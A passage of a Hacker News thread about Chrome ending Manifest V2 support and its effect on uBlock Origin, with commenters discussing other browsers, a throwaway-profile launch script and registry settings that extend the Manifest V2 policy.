| heavily, that's kind of a sign you've messed up. Like on
| the scale of severity
| (https://raw.githubusercontent.com/matthiasn/talk-
| transcripts...), at least as severe as really bad coupling
| or brittleness. Thank goodness for the tools that let
| people efficiently figure things out and get on with
| things, but it's really better to have not needed to be in
| such a situation to begin with.
|
| I have a similar view with valgrind -- amazing tool
| everyone would rather exist than not, one could imagine a
| "Google Valgrind" and "Mozilla Valgrind" competing on mild
| differences of amazing, but really, life is better if you
| can just use a managed language and never have to deal with
| any flavor of valgrind. I think there are ways to do webdev
| that significantly reduce the need to use any browser dev
| tools at all, though the domain necessitates some use.
| ClojureScript in 2014 was showing the way.
| aftbit wrote:
| I use a little `chrome-new` script to develop (and sometimes
| take video calls or use buggy apps) against a totally clean
| fresh Chrome profile, then I use Firefox with uBlock Origin
| and uMatrix for daily driving. #!/bin/sh
| [ -z $CHROME ] && CHROME=chromium TMPDIR=$(mktemp -d
| /dev/shm/chrome-XXXXX) $CHROME --user-data-
| dir=$TMPDIR --no-first-run --no-default-browser-check "$@"
| rm -rf $TMPDIR
|
| The first line lets me override which Chrome version I launch
| if I want to try instead google-chrome-stable or google-
| chrome-beta for example. I keep them all installed from the
| AUR on Arch.
| pushupentry1219 wrote:
| I prefer this way. Much simpler but way more aggressive:
|
| `export HOME=$TMPDIR chrome <args...>`
|
| Will make chrome think that $TMPDIR is $HOME. Keep in mind
| that means your downloads for example would also be deleted
| after the rm -rf
|
| This works for most other software too
| zufallsheld wrote:
| Better just use 'HOME=$TMPDIR chrome <args... > without
| the export. With export the Home variable will persist
| for the current shell, potentially leading to unwanted
| results.
| pushupentry1219 wrote:
| Right correct. I put this in a script hence the export.
| Though its probably not necessary as well.
| knowitnone wrote:
| their dev environment is still pretty bad
| huhtenberg wrote:
| Have you seen Mozilla leadership team though? _That_ is
| something else altogether.
| ethagnawl wrote:
| I was going to make a joke about giving Firebug a look but
| (TIL) Firefox's Devtools actually subsumed Firebug a few years
| back. That's pretty cool and a nice note for that project to
| end on.
|
| https://getfirebug.com
| Izkata wrote:
| They make it sound nice, but the last release of Firebug was
| after that page says they were unified, and only about half a
| year before Firefox Quantum removed XUL, which would have
| killed Firebug anyway. I was still using Firebug because its
| console was still better than the built-in devtools.
| modzu wrote:
| chrome hasnt been cool for a while
| greatgib wrote:
| It is really crazy that we are taken hostage/blackmail by
| whatever harmful decision Google takes in their own interest.
| IncreasePosts wrote:
| Chromium is open source, you're free to use it.
| vehemenz wrote:
| This is irrelevant because the changes are occurring upstream
| in Chromium by mostly Google developers.
| IncreasePosts wrote:
| Open source also means you're free to fork it or freeze
| your version
| Dylan16807 wrote:
| Forking is untenable for individual humans with something
| so complicated, and freezing is dangerously insecure.
| sva_ wrote:
| I was looking for an excuse to switch back to Firefox anyways.
| QuantumGood wrote:
| "browsers using the ExtensionManifestV2Availability policy will
| be exempt from any browser changes until June 2025"
|
| To extend ManifestV2 in Chrome, add the text below to a text
| file, saving and running it as a .reg will create and add a value
| of 2 to "ExtensionManifestV2Availability" in the
| HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
|
| (When you open/run a .reg file, it updates your registry, usually
| preceeded by a warning.)
|
| Alternatively, you could do this manually by pressing the Windows
| key, type "run" (without the quotes) and enter, type "regedit"
| (without the quotes) and enter, then navigate as far as you can
| to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
|
| You may find there is no "Chrome" key and will need to create it,
| as well as creating ExtensionManifestV2Availability
|
| --------------------------------------
| [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
| "ExtensionManifestV2Availability"=dword:00000002
| exikyut wrote:
| And IIRC including the quotes in a filename in a save dialog,
| like "manifestv2.reg" (incl quotes), will save it with the
| extension you typed, so you won't end up with
| 'manifestv2.reg.txt'. So you skip a potentially otherwise
| needed rename step.
| gzer0 wrote:
| Wow, thanks for this tip. Saves the effort of having to
| manually find "all types" in the drop down... this is so much
| easier.
|
| Also, just for clarification: Windows
| Registry Editor Version 5.00
| [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
| "ExtensionManifestV2Availability"=dword:00000002
|
| Apparently, the line _Windows Registry Editor Version 5.00_
| is necessary at the beginning of the .reg file. This line
| indicates the format version for the registry file and tells
| Windows that it is compatible with the current registry
| editor (according to GPT). This worked for me.
|
| Save the file as:
| EnableExtensionManifestV2.reg
| EvanAnderson wrote:
| Single command line (Run as Administrator-- you can do that
| from the Windows key-R dialog by holding CTRL-SHIFT and
| pressing ENTER): REG ADD
| HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome /v
| ExtensionManifestV2Availability /t REG_DWORD /d 2
| tech234a wrote:
| Note that this will also disable Chrome's DNS Over HTTPS as
| Chrome disables the DoH resolver by default when the browser is
| managed by enterprise policies like this one. See the platform-
| specific links mentioned on the uBlock Origin subreddit [1],
| many of which also include instructions for enabling the DoH
| resolver while managing the browser using policies.
|
| [1]:
| https://old.reddit.com/r/uBlockOrigin/comments/1d49ud1/manif...
| askvictor wrote:
| What about Linux and Mac?
| rootsu wrote:
| Link for Mac command
|
| https://old.reddit.com/r/chrome/comments/1d799pa/tutorial_on.
| ..
| bobajeff wrote:
| I'm addition to all the calls to switch to another browser I'd
| also have people consider the websites they use as potential
| dependencies on chrome.
|
| Right now most websites don't seem to require any specific chrome
| feature but with Google's pushing some API's like their Web
| Environment Integrity proposal I'm worried sites will start to
| lock their site to Google Chrome and their official Mobile
| clients.
| etimberg wrote:
| Time to switch my last machine that still uses Chrome as the
| default.
| jbverschoor wrote:
| Well, the web is unusable without an adblocker. Time to move to
| another browser.
| zb3 wrote:
| Manifest V3 is not the problem itself. But removing
| webRequestBlocking and creating some ridiculous limits for the
| DNR api are, these changes should be reversed downstream.
| amatecha wrote:
| ... can we just have a browser that has the functionality of
| uBlock Origin built-in?
|
| Feeling nostalgic for a time when browsing HTTP wasn't such a
| persistently-adversarial experience :(
| jakeogh wrote:
| URL requests should go to a OS level, where the user can
| intercept them at will. We do not need to give browsers the
| socket API.
| AstroJetson wrote:
| And people ask me why I don't run current versions of browsers.
| rrrix1 wrote:
| If anyone has any guides or blogs related to migrating away from
| Chrome for a multi-decade user (thousands of bookmarks, saved
| pages/read later, etc.) I would sure be interested.
|
| Every time I try to migrate my _very large_ bookmark collection
| to another browser, it either misbehaves and partially loses some
| data or fails completely.
| Ylpertnodi wrote:
| >Every time I try to
|
| It would be good to know what not-chromes you have tried, so as
| not to suggest 'x', which may have not worked for you.
| marcell wrote:
| Would it be possible to do an OS level ad blocker that works
| similarly to uBO?
| KeepFlying wrote:
| Seems unlikely with how many different ways ui elements are
| handles across an OS (including apps that do their own
| rendering). Though I bet you could block some subset of well
| known ones and block a lot of the network traffic that feeds
| ads.
| riiii wrote:
| I'm years ahead of them. I disabled Chrome years ago.
| lofaszvanitt wrote:
| V3 has some utterly/unnecessarily complicated shite going on,
| like offscreen documents, and I think it will get worse as time
| progresses. Google really needs some bludgeoning.
| 0cf8612b2e1e wrote:
| I have not kept up -what is the steel man argument for V3?
| Presumably Google has a rationale other than "ad blockers are
| bad for business"
| contravariant wrote:
| Ad blocker-wise I think the best argument is that
| internalising the traffic blocking can be made a lot more
| efficient than putting a javascript interpreter in between.
|
| The counter argument is that ad-blocking is an arms-race and
| the only reason a subset of traffic blocking methods is going
| to work at all is because there isn't a big enough incentive
| _yet_.
|
| Other than that the arguments in favour of V3 are going to be
| about the same as for any API update. My guess is a few extra
| APIs and more granular permissions.
| neilv wrote:
| Does Mozilla have a PR blitz, to pick up a big chunk of users who
| have a moment of disruption, and want their full uBlock Origin?
|
| It might've been better, had uBlock Origin Lite not happened, but
| is there still a migration opportunity here, and is Mozilla
| working it?
| politelemon wrote:
| They seem to have the opposite going on, they often manage to
| fumble what little opportunity you'd think they have. Was just
| thinking of the ubo lite example you mentioned:
|
| https://news.ycombinator.com/item?id=41707418
|
| And also recently, their poor engagement/comms around Privacy-
| Preserving Attribution:
|
| https://blog.mozilla.org/en/mozilla/improving-online-adverti...
| cookiengineer wrote:
| There's gonna be a new browser wars.
|
| How exciting!
|
| Time to do your part. Switch to ladybird!
|
| (Insert imaginary we want you for the army poster here)
| zamadatix wrote:
| I realize I'm about to post something that sounds like the most
| generic HN slop comments... but, considering it's why Mozilla
| initially made a whole new language in the first place, I hope
| most can look past what fanatics would normally say and focus
| on the scenario:
|
| I was ecstatic about Ladybird from a "fun NIH project"
| perspective but once it became "serious" and had a cross-
| platform daily-driver long term focus it was quite the let down
| that the hot new independent kickstart was... still going to be
| built on C++ anyways. Even the Serenity ecosystem had started
| work on a NIH memory safe language - Jakt! I'm not going to say
| the "R" word (mostly because I'm less interested "which" and
| more interested in the "what") but the one place I'd really
| like to see memory safety is the new fresh-engined web browser
| written by a small team (or really, any team).
|
| On that front https://servo.org/ is "alive" again under the
| Linux Foundation. It has a focus on being an easily embeddable
| engine and it seems to be picking up a bit of steam. Whether or
| not it really takes off remains to be seen. I'll be watching
| closely though!
| cookiengineer wrote:
| I agree with you there, on all parts.
|
| My reason for learning Rust in the first place was trying to
| contribute to the servo engine. But then, Mozilla happened.
| My hope for servo continues, but it won't go anywhere if it
| stays in the limbo it has been in after Mozilla ditched it as
| a project. We need a real browser project, with a full UI/UX
| and everything, until people take it serious as a base to
| fork off.
|
| The problem with reality is that almost all software is still
| built on C. Kernels, userspace APIs, libraries, everything. I
| just wish that we would've gotten something like C ABIs, but
| with memory safety and VM-to-VM communication in mind, e.g.
| for Rust and Go, along the way. WebASM / WASI somehow got
| there, at least in that direction. But it's never seen as a
| shared object or dll replacement, and always is just a
| compile target and nothing more - even when the potential is
| there.
|
| Something like that would solve so many problems that all
| kinds of programming language are trying to solve by
| themselves, over and over again.
| zamadatix wrote:
| Your personal site is awesome by the way! Though I got too
| excited about the CV "challenge" until I read on GitHub it
| really is just a random password you hand out to people and
| not a "find the secret password somewhere and trigger its"
| somewhere :p.
|
| Cookie invaders gave me a good shock too :D. As well as the
| random "bloop" sounds. 10/10
| cookiengineer wrote:
| Haha, thanks for the flowers. I tried to make my website
| fun to use while not sacrifing backwards compatibility.
|
| PS: The crypto challenge is related to the song that the
| avatar is humming :)
| zamadatix wrote:
| Well, shit... now I must resist the urge to go back and
| figure it out! I've got things to do this weekend,
| couldn't you have lied and said it wasn't really a
| challenge! ;)
| cookiengineer wrote:
| Yeah when I built that I was way too deep in the
| steganographic rabbit hole. Might have to rework it at
| some point, because it needs a deep understanding of how
| to use statistical analysis to find a key/alphabet, and
| the frames that don't match the previous audio frame so
| that the codec skips them as corrupt frames. It was the
| year after 3301 so well...I kind of overdid it :D
|
| Maybe something assembly related would be fun to do, too.
| These days I am reversing lots of malware, so sth like
| patching a binary so that it evolves into a different
| program similar to how APE does it would be a fun
| challenge, I guess :D
| eviks wrote:
| If only Mozilla hadn't wasted all that time and money and created
| a Chrome-comparable in stability/performance and Vivaldi-
| comparable in customization, we could've have an easy way out of
| this current mess...
|
| (v3 drops not only ad-blockers but also user style managers, so a
| significant degradation of the web interfaces)
| TexanFeller wrote:
| I daily drive Firefox. I haven't found a single website in
| years that's made me open Chrome. There's nothing slow about
| Firefox.
| eviks wrote:
| I don't daily drive because I have found them, plenty of
| other people complain about this to make this not unique
|
| (though I'd eat that up for more ergonomic general use
| enabled by customizations)
| arctek wrote:
| I think at this point I'd rather pay for a desktop browser,
| something with blocking baked in at compile time. It would be
| such a QoL improvement that it's worth paying a yearly
| subscription for.
| beretguy wrote:
| I'm already paying for kagi search.
| damianh wrote:
| When the hell will firefox have a decent profile manager?? It's
| the one thing that is preventing me from switching over. No,
| container tabs are NOT it.
| coldpie wrote:
| It's not a feature I use, but if you launch with "firefox
| --ProfileManager" it pops up a profile selection window. Maybe
| that's in the ballpark of what you want?
| https://support.mozilla.org/en-US/kb/profile-manager-create-...
| nox101 wrote:
| I'm curious what V3 doesn't allow that V2 does.
|
| I read an article about Ublock Origin light. It claimed it
| couldn't do script injection and content blocking but I've
| written V3 extensions that do that though maybe what I'm thinking
| and what ublock origin does are different things. Does anyone
| know specific details or maybe a pointer to docs on what's not
| possible?
___________________________________________________________________
(page generated 2024-10-12 23:02 UTC)